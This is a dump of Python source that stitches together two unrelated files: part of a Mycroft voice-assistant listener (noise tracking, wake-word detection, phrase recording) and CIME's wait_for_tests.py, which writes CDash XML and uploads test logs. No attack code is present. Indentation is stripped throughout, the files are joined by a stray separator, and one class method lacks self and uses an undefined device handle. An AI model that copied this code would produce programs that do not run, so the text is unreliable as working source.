def __exit__(self, exc_type, exc_value, traceback):
return self._stop()
def _stop(self):
"""Stop and close an open stream."""
try:
if not self.stream.is_stopped():
self.stream.stop_stream()
self.stream.close()
except Exception:
LOG.exception('Failed to stop mic input stream')
# Let's pretend nothing is wrong...
self.stream = None
self.audio.terminate()
def restart(self):
"""Shutdown input device and restart."""
self._stop()
self._start()
def mute(self):
self.muted = True
if self.stream:
self.stream.mute()
def unmute(self):
self.muted = False
if self.stream:
self.stream.unmute()
def is_muted(self):
return self.muted
def duration_to_bytes(self, sec):
"""Converts a duration in seconds to number of recorded bytes.
Args:
sec: number of seconds
Returns:
(int) equivalent number of bytes recorded by this Mic
"""
return int(sec * self.SAMPLE_RATE) * self.SAMPLE_WIDTH
def get_silence(num_bytes):
return b'\0' * num_bytes
class NoiseTracker:
"""Noise tracker, used to deterimine if an audio utterance is complete.
The current implementation expects a number of loud chunks (not necessary
in one continous sequence) followed by a short period of continous quiet
audio data to be considered complete.
Args:
minimum (int): lower noise level will be threshold for "quiet" level
maximum (int): ceiling of noise level
sec_per_buffer (float): the length of each buffer used when updating
the tracker
loud_time_limit (float): minimum time in seconds of loud audio
required before a sentence can be considered complete
silence_time_limit (float): time limit for silence to abort sentence
silence_after_loud (float): time of silence to finalize the sentence.
default 0.25 seconds.
"""
def __init__(self, minimum, maximum, sec_per_buffer, loud_time_limit,
silence_time_limit, silence_after_loud_time=0.25):
self.min_level = minimum
self.max_level = maximum
self.sec_per_buffer = sec_per_buffer
self.num_loud_chunks = 0
self.level = 0
# Smallest number of loud chunks required to return loud enough
self.min_loud_chunks = int(loud_time_limit / sec_per_buffer)
self.max_silence_duration = silence_time_limit
self.silence_duration = 0
# time of quiet period after long enough loud data to consider the
# sentence complete
self.silence_after_loud = silence_after_loud_time
# Constants
self.increase_multiplier = 200
self.decrease_multiplier = 100
def _increase_noise(self):
"""Bumps the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level < self.max_level:
self.level += self.increase_multiplier * self.sec_per_buffer
def _decrease_noise(self):
"""Decrease the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level > self.min_level:
self.level -= self.decrease_multiplier * self.sec_per_buffer
def update(self, is_loud):
"""Update the tracking. with either a loud chunk or a quiet chunk.
Args:
is_loud: True if a loud chunk should be registered
False if a quiet chunk should be registered
"""
if is_loud:
self._increase_noise()
self.num_loud_chunks += 1
else:
self._decrease_noise()
# Update duration of energy under the threshold level
if self._quiet_enough():
self.silence_duration += self.sec_per_buffer
else: # Reset silence duration
self.silence_duration = 0
def _loud_enough(self):
"""Check if the noise loudness criteria is fulfilled.
The noise is considered loud enough if it's been over the threshold
for a certain number of chunks (accumulated, not in a row).
"""
return self.num_loud_chunks > self.min_loud_chunks
def _quiet_enough(self):
"""Check if the noise quietness criteria is fulfilled.
The quiet level is instant and will return True if the level is lower
or equal to the minimum noise level.
"""
return self.level <= self.min_level
def recording_complete(self):
"""Has the end creteria for the recording been met.
If the noise level has decresed from a loud level to a low level
the user has stopped speaking.
Alternatively if a lot of silence was recorded without detecting
a loud enough phrase.
"""
too_much_silence = (self.silence_duration > self.max_silence_duration)
if too_much_silence:
LOG.debug('Too much silence recorded without start of sentence '
'detected')
return ((self._quiet_enough() and
self.silence_duration > self.silence_after_loud) and
(self._loud_enough() or too_much_silence))
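# Illustrative sketch (not part of the original module): the NoiseTracker life
# cycle with synthetic chunks. The constructor values are assumptions that
# roughly match a 16 kHz source read in 1024-sample buffers.
def _demo_noise_tracker():
    sec_per_buffer = 1024 / 16000.0                  # ~64 ms per chunk
    tracker = NoiseTracker(minimum=0, maximum=25,
                           sec_per_buffer=sec_per_buffer,
                           loud_time_limit=0.5,
                           silence_time_limit=5.0)
    for _ in range(10):                              # ~0.64 s of speech
        tracker.update(is_loud=True)
    while not tracker.recording_complete():          # trailing silence
        tracker.update(is_loud=False)
    return tracker.silence_duration                  # > silence_after_loud (0.25 s)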
class ResponsiveRecognizer(speech_recognition.Recognizer):
# Padding of silence when feeding to pocketsphinx
SILENCE_SEC = 0.01
# The minimum seconds of noise before a
# phrase can be considered complete
MIN_LOUD_SEC_PER_PHRASE = 0.5
# The minimum seconds of silence required at the end
# before a phrase will be considered complete
MIN_SILENCE_AT_END = 0.25
# Time between pocketsphinx checks for the wake word
SEC_BETWEEN_WW_CHECKS = 0.2
# Set up the HID driver
# Have to double-check these are the right ones
#RESPEAKER_VENDOR_ID = 0x2886
#RESPEAKER_PRODUCT_ID = 0x07
#_dev = hid.device()
#_dev.open(RESPEAKER_VENDOR_ID, RESPEAKER_PRODUCT_ID)
def __init__(self, wake_word_recognizer, watchdog=None):
self._watchdog = watchdog or (lambda: None) # Default to dummy func
self.config = Configuration.get()
listener_config = self.config.get('listener')
self.upload_url = listener_config['wake_word_upload']['url']
self.upload_disabled = listener_config['wake_word_upload']['disable']
self.wake_word_name = wake_word_recognizer.key_phrase
self.overflow_exc = listener_config.get('overflow_exception', False)
super().__init__()
self.wake_word_recognizer = wake_word_recognizer
self.audio = pyaudio.PyAudio()
self.multiplier = listener_config.get('multiplier')
self.energy_ratio = listener_config.get('energy_ratio')
# Check the config for the flag to save wake words, utterances
# and for a path under which to save them
self.save_utterances = listener_config.get('save_utterances', False)
self.save_wake_words = listener_config.get('record_wake_words', False)
self.save_path = listener_config.get('save_path', gettempdir())
self.saved_wake_words_dir = join(self.save_path, 'mycroft_wake_words')
if self.save_wake_words and not isdir(self.saved_wake_words_dir):
os.mkdir(self.saved_wake_words_dir)
self.saved_utterances_dir = join(self.save_path, 'mycroft_utterances')
if self.save_utterances and not isdir(self.saved_utterances_dir):
os.mkdir(self.saved_utterances_dir)
self.mic_level_file = os.path.join(get_ipc_directory(), "mic_level")
# Signal statuses
self._stop_signaled = False
self._listen_triggered = False
self._account_id = None
# The maximum seconds a phrase can be recorded,
# provided there is noise the entire time
self.recording_timeout = listener_config.get('recording_timeout',
10.0)
# The maximum time it will continue to record silence
# when not enough noise has been detected
self.recording_timeout_with_silence = listener_config.get(
'recording_timeout_with_silence', 3.0)
@property
def account_id(self):
"""Fetch account from backend when needed.
If an error occurs it's handled and a temporary value is returned.
When a value is received it will be cached until next start.
"""
if not self._account_id:
try:
self._account_id = DeviceApi().get()['user']['uuid']
except (requests.RequestException, AttributeError):
pass # These are expected and won't be reported
except Exception as e:
LOG.debug('Unhandled exception while determining device_id, '
'Error: {}'.format(repr(e)))
return self._account_id or '0'
def record_sound_chunk(self, source):
return source.stream.read(source.CHUNK, self.overflow_exc)
@staticmethod
def calc_energy(sound_chunk, sample_width):
return audioop.rms(sound_chunk, sample_width)
# See if there's any auto report (VAD and voice angle); if not, return immediately with None.
# NOTE: relies on the ReSpeaker HID handle (_dev) from the commented-out
# block above, so this helper is dead code unless that device setup is re-enabled.
def read_auto_report():
# Temporarily turn off blocking, the auto report only comes in on VAD changes
_dev.set_nonblocking(1)
ret = _dev.read(9)
_dev.set_nonblocking(0)
if(len(ret)):
# Make sure it's the auto report register (0xFF)
if(ret[0] == 0xFF):
# Angle is two bytes
angle = ret[6]*256 + ret[5]
# VAD is 2 for speaking, 0 for not, 1 for ???
vad = ret[4]
return (angle, vad)
return (None, None)
def _record_phrase(
self,
source,
sec_per_buffer,
stream=None,
ww_frames=None
):
"""Record an entire spoken phrase.
Essentially, this code waits for a period of silence and then returns
the audio. If silence isn't detected, it will terminate and return
a buffer of self.recording_timeout duration.
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded.
ww_frames (deque): Frames of audio data from the last part of wake
word detection.
Returns:
bytearray: complete audio buffer recorded, including any
silence at the end of the user's utterance
"""
noise_tracker = NoiseTracker(0, 25, sec_per_buffer,
self.MIN_LOUD_SEC_PER_PHRASE,
self.recording_timeout_with_silence)
# Maximum number of chunks to record before timing out
max_chunks = int(self.recording_timeout / sec_per_buffer)
num_chunks = 0
# bytearray to store audio in, initialized with a single sample of
# silence.
byte_data = get_silence(source.SAMPLE_WIDTH)
if stream:
stream.stream_start()
phrase_complete = False
while num_chunks < max_chunks and not phrase_complete:
if ww_frames:
chunk = ww_frames.popleft()
else:
chunk = self.record_sound_chunk(source)
byte_data += chunk
num_chunks += 1
if stream:
stream.stream_chunk(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
test_threshold = self.energy_threshold * self.multiplier
is_loud = energy > test_threshold
noise_tracker.update(is_loud)
if not is_loud:
self._adjust_threshold(energy, sec_per_buffer)
# The phrase is complete if the noise_tracker end of sentence
# criteria is met or if the top-button is pressed
phrase_complete = (noise_tracker.recording_complete() or
check_for_signal('buttonPress'))
# Periodically write the energy level to the mic level file.
if num_chunks % 10 == 0:
self._watchdog()
self.write_mic_level(energy, source)
# Let's do the DOA here as well
#(angle, vad) = read_auto_report()
#emitter.emit("recognizer_loop:DOA", '{"angle":'+angle+', "vad":'+vad+'}')
return byte_data
def write_mic_level(self, energy, source):
with open(self.mic_level_file, 'w') as f:
f.write('Energy: cur={} thresh={:.3f} muted={}'.format(
energy,
self.energy_threshold,
int(source.muted)
)
)
def _skip_wake_word(self):
"""Check if told programatically to skip the wake word
For example when we are in a dialog with the user.
"""
if self._listen_triggered:
return True
# Pressing the Mark 1 button can start recording (unless
# it is being used to mean 'stop' instead)
if check_for_signal('buttonPress', 1):
# give other processes time to consume this signal if
# it was meant to be a 'stop'
sleep(0.25)
if check_for_signal('buttonPress'):
# Signal is still here, assume it was intended to
# begin recording
LOG.debug("Button Pressed, wakeword not needed")
return True
return False
def stop(self):
"""Signal stop and exit waiting state."""
self._stop_signaled = True
def _compile_metadata(self):
ww_module = self.wake_word_recognizer.__class__.__name__
if ww_module == 'PreciseHotword':
model_path = self.wake_word_recognizer.precise_model
with open(model_path, 'rb') as f:
model_hash = md5(f.read()).hexdigest()
else:
model_hash = '0'
return {
'name': self.wake_word_name.replace(' ', '-'),
'engine': md5(ww_module.encode('utf-8')).hexdigest(),
'time': str(int(1000 * get_time())),
'sessionId': SessionManager.get().session_id,
'accountId': self.account_id,
'model': str(model_hash)
}
def trigger_listen(self):
"""Externally trigger listening."""
LOG.debug('Listen triggered from external source.')
self._listen_triggered = True
def _upload_wakeword(self, audio, metadata):
"""Upload the wakeword in a background thread."""
LOG.debug(
"Wakeword uploading has been disabled. The API endpoint used in "
"Mycroft-core v20.2 and below has been deprecated. To contribute "
"new wakeword samples please upgrade to v20.8 or above."
)
# def upload(audio, metadata):
# requests.post(self.upload_url,
# files={'audio': BytesIO(audio.get_wav_data()),
# 'metadata': StringIO(json.dumps(metadata))})
# Thread(target=upload, daemon=True, args=(audio, metadata)).start()
def _send_wakeword_info(self, emitter):
"""Send messagebus message indicating that a wakeword was received.
Args:
emitter: bus emitter to send information on.
"""
SessionManager.touch()
payload = {'utterance': self.wake_word_name,
'session': SessionManager.get().session_id}
emitter.emit("recognizer_loop:wakeword", payload)
def _write_wakeword_to_disk(self, audio, metadata):
"""Write wakeword to disk.
Args:
audio: Audio data to write
metadata: List of metadata about the captured wakeword
"""
filename = join(self.saved_wake_words_dir,
'_'.join(str(metadata[k]) for k in sorted(metadata)) +
'.wav')
with open(filename, 'wb') as f:
f.write(audio.get_wav_data())
def _handle_wakeword_found(self, audio_data, source):
"""Perform actions to be triggered after a wakeword is found.
This includes: emit event on messagebus that a wakeword is heard,
store wakeword to disk if configured and sending the wakeword data
to the cloud in case the user has opted into the data sharing.
"""
# Save and upload positive wake words as appropriate
upload_allowed = (self.config['opt_in'] and not self.upload_disabled)
if (self.save_wake_words or upload_allowed):
audio = self._create_audio_data(audio_data, source)
metadata = self._compile_metadata()
if self.save_wake_words:
# Save wake word locally
self._write_wakeword_to_disk(audio, metadata)
# Upload wake word for opt_in people
if upload_allowed:
self._upload_wakeword(audio, metadata)
def _wait_until_wake_word(self, source, sec_per_buffer):
"""Listen continuously on source until a wake word is spoken
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
"""
# The maximum audio in seconds to keep for transcribing a phrase
# The wake word must fit in this time
ww_duration = self.wake_word_recognizer.expected_duration
ww_test_duration = max(3, ww_duration)
mic_write_counter = 0
num_silent_bytes = int(self.SILENCE_SEC * source.SAMPLE_RATE *
source.SAMPLE_WIDTH)
silence = get_silence(num_silent_bytes)
# Max bytes for byte_data before audio is removed from the front
max_size = source.duration_to_bytes(ww_duration)
test_size = source.duration_to_bytes(ww_test_duration)
audio_buffer = CyclicAudioBuffer(max_size, silence)
buffers_per_check = self.SEC_BETWEEN_WW_CHECKS / sec_per_buffer
buffers_since_check = 0.0
# Rolling buffer to track the audio energy (loudness) heard on
# the source recently. An average audio energy is maintained
# based on these levels.
average_samples = int(5 / sec_per_buffer) # average over last 5 secs
audio_mean = RollingMean(average_samples)
# These are frames immediately after wake word is detected
# that we want to keep to send to STT
ww_frames = deque(maxlen=7)
said_wake_word = False
audio_data = None
while (not said_wake_word and not self._stop_signaled and
not self._skip_wake_word()):
chunk = self.record_sound_chunk(source)
audio_buffer.append(chunk)
ww_frames.append(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
audio_mean.append_sample(energy)
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
# maintain the threshold using average
if self.energy_threshold < energy < audio_mean.value * 1.5:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if mic_write_counter % 3:
self._watchdog()
self.write_mic_level(energy, source)
mic_write_counter += 1
buffers_since_check += 1.0
# Send chunk to wake_word_recognizer
self.wake_word_recognizer.update(chunk)
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
audio_data = audio_buffer.get_last(test_size) + silence
said_wake_word = \
self.wake_word_recognizer.found_wake_word(audio_data)
self._listen_triggered = False
return WakeWordData(audio_data, said_wake_word,
self._stop_signaled, ww_frames)
@staticmethod
def _create_audio_data(raw_data, source):
"""
Constructs an AudioData instance with the same parameters
as the source and the specified frame_data
"""
return AudioData(raw_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def mute_and_confirm_listening(self, source):
audio_file = resolve_resource_file(
self.config.get('sounds').get('start_listening'))
if audio_file:
source.mute()
play_wav(audio_file).wait()
source.unmute()
return True
else:
return False
def listen(self, source, emitter, stream=None):
"""Listens for chunks of audio that Mycroft should perform STT on.
This will listen continuously for a wake-up-word, then return the
audio chunk containing the spoken phrase that comes immediately
afterwards.
Args:
source (AudioSource): Source producing the audio chunks
emitter (EventEmitter): Emitter for notifications of when recording
begins and ends.
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded
Returns:
AudioData: audio with the user's utterance, minus the wake-up-word
"""
assert isinstance(source, AudioSource), "Source must be an AudioSource"
# bytes_per_sec = source.SAMPLE_RATE * source.SAMPLE_WIDTH
sec_per_buffer = float(source.CHUNK) / source.SAMPLE_RATE
# Every time a new 'listen()' request begins, reset the threshold
# used for silence detection. This is as good of a reset point as
# any, as we expect the user and Mycroft to not be talking.
# NOTE: adjust_for_ambient_noise() doc claims it will stop early if
# speech is detected, but there is no code to actually do that.
self.adjust_for_ambient_noise(source, 1.0)
LOG.debug("Waiting for wake word...")
ww_data = self._wait_until_wake_word(source, sec_per_buffer)
ww_frames = None
if ww_data.found:
# If the wakeword was heard send it
self._send_wakeword_info(emitter)
self._handle_wakeword_found(ww_data.audio, source)
ww_frames = ww_data.end_audio
if ww_data.stopped:
# If the waiting returned from a stop signal
return
LOG.debug("Recording...")
# If enabled, play a wave file with a short sound to audibly
# indicate recording has begun.
if self.config.get('confirm_listening'):
if self.mute_and_confirm_listening(source):
# Clear frames from wakeword detections since they're
# irrelevant after the mute - play wav - unmute sequence
ww_frames = None
# Notify system of recording start
LOG.info("MIC: reording begins")
emitter.emit("recognizer_loop:record_begin")
frame_data = self._record_phrase(
source,
sec_per_buffer,
stream,
ww_frames
)
audio_data = self._create_audio_data(frame_data, source)
LOG.info("MIC: recording ends")
emitter.emit("recognizer_loop:record_end")
if self.save_utterances:
LOG.info("Recording utterance")
stamp = str(datetime.datetime.now())
filename = "/{}/{}.wav".format(
self.saved_utterances_dir,
stamp
)
with open(filename, 'wb') as filea:
filea.write(audio_data.get_wav_data())
LOG.debug("Thinking...")
return audio_data
def _adjust_threshold(self, energy, seconds_per_buffer):
if self.dynamic_energy_threshold and energy > 0:
# account for different chunk sizes and rates
damping = (
self.dynamic_energy_adjustment_damping ** seconds_per_buffer)
target_energy = energy * self.energy_ratio
self.energy_threshold = (
self.energy_threshold * damping +
target_energy * (1 - damping))
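# Worked example of the damping math above (values assumed for illustration):
# with dynamic_energy_adjustment_damping=0.15 and seconds_per_buffer=0.1 the
# per-buffer damping is 0.15 ** 0.1 ~= 0.827, so for energy_threshold=100,
# energy=300 and energy_ratio=1.5 the new threshold is
# 100 * 0.827 + 450 * 0.173 ~= 160.5 -- an exponential moving average that
# drifts toward energy * energy_ratio.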
|
wait_for_tests.py | #pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy, CIMEError
from CIME.XML.machines import Machines
from CIME.test_status import *
from CIME.provenance import save_test_success
from CIME.case.case import Case
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "E3SM"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
with open(output_file, 'r') as fd:
return fd.read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_xml_boiler(phase, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit):
###############################################################################
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
phase_elem = xmlet.SubElement(site_elem, phase)
xmlet.SubElement(phase_elem, "StartDateTime").text = time.ctime(current_time)
xmlet.SubElement(phase_elem, "Start{}Time".format("Test" if phase == "Testing" else phase)).text = str(int(current_time))
return site_elem, phase_elem
###############################################################################
def create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, config_elem = create_cdash_xml_boiler("Configure", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(config_elem, "ConfigureCommand").text = "namelists"
config_results = []
for test_name in sorted(results):
test_status = results[test_name][1]
config_results.append("{} {} Config {}".format("" if test_status != NAMELIST_FAIL_STATUS else "CMake Warning:\n", test_name, "PASS" if test_status != NAMELIST_FAIL_STATUS else "NML DIFF"))
xmlet.SubElement(config_elem, "Log").text = "\n".join(config_results)
xmlet.SubElement(config_elem, "ConfigureStatus").text = "0"
xmlet.SubElement(config_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Configure.xml"))
###############################################################################
def create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, build_elem = create_cdash_xml_boiler("Build", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(build_elem, "ConfigureCommand").text = "case.build"
build_results = []
for test_name in sorted(results):
build_results.append(test_name)
xmlet.SubElement(build_elem, "Log").text = "\n".join(build_results)
for idx, test_name in enumerate(sorted(results)):
test_path = results[test_name][0]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
if get_test_time(test_norm_path) == 0:
error_elem = xmlet.SubElement(build_elem, "Error")
xmlet.SubElement(error_elem, "Text").text = test_name
xmlet.SubElement(error_elem, "BuildLogLine").text = str(idx)
xmlet.SubElement(error_elem, "PreContext").text = test_name
xmlet.SubElement(error_elem, "PostContext").text = ""
xmlet.SubElement(error_elem, "RepeatCount").text = "0"
xmlet.SubElement(build_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Build.xml"))
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, testing_elem = create_cdash_xml_boiler("Testing", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
xmlet.SubElement(test_list_elem, "Test").text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if test_passed:
full_test_elem.attrib["Status"] = "passed"
elif (test_status == TEST_PEND_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
xmlet.SubElement(full_test_elem, "Name").text = test_name
xmlet.SubElement(full_test_elem, "Path").text = test_norm_path
xmlet.SubElement(full_test_elem, "FullName").text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
xmlet.SubElement(named_measurement_elem, "Value").text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
xmlet.SubElement(testing_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value SRCROOT", from_dir=first_result_case)
except CIMEError:
# Use repo containing this script as last resort
srcroot = os.path.join(CIME.utils.get_cime_root(), "..")
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(SHAREDLIB_BUILD_PHASE)
build_status = TEST_FAIL_STATUS if build_status == TEST_FAIL_STATUS else ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
test_log_path = os.path.join(os.path.dirname(test_status_filepath), ".internal_test_status.log")
# We don't want to make it a requirement that wait_for_tests has write access
# to all case directories
try:
fd = open(test_log_path, "w")
fd.close()
except (IOError, OSError):
test_log_path = "/dev/null"
prior_ts = None
with open(test_log_path, "w") as log_fd:
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=not no_run, # Important
no_run=no_run,
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if prior_ts is not None and prior_ts != ts:
log_fd.write(ts.phase_statuses_dump())
log_fd.write("OVERALL: {}\n\n".format(test_status))
prior_ts = ts
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
